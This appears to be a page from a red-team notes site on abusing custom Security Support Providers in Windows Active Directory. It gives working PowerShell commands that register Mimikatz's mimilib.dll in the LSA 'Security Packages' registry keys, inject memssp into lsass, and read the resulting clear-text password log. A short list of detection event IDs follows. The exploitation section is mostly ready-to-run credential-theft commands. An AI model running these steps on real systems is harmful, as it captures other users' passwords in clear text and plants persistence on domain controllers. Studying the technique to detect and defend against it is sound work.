GithubTwitter

Custom SSPs

General

  • A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection

  • Some SSP packages by Microsoft are

    • NTLM

    • Kerberos

    • Wdigest

    • CredSSP

  • Mimikatz provdes custom SSP - mimilib.dll

  • This SSP logs local logons, service account and machine aacount passwords in clear text on the target server

Exploitation

# First way: drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | Select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Second way: using mimikatz to inject into lsass (unstable with Server 2016)
Invoke-Mimikatz -Command '"misc::memssp"'

# All logons on the DC are logged to C:\Windows\system32\kiwissp.log
Get-Content C:\Windows\system32\kiwissp.log

Detection

  • Event IDs:

    • 4657: Audit creation/change of HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\SecurityPackages

    • 4624: Account Logon

    • 4634: Account Logoff

    • 4672: Admin Logon

PreviousACL AttacksNextDC Shadow

Last updated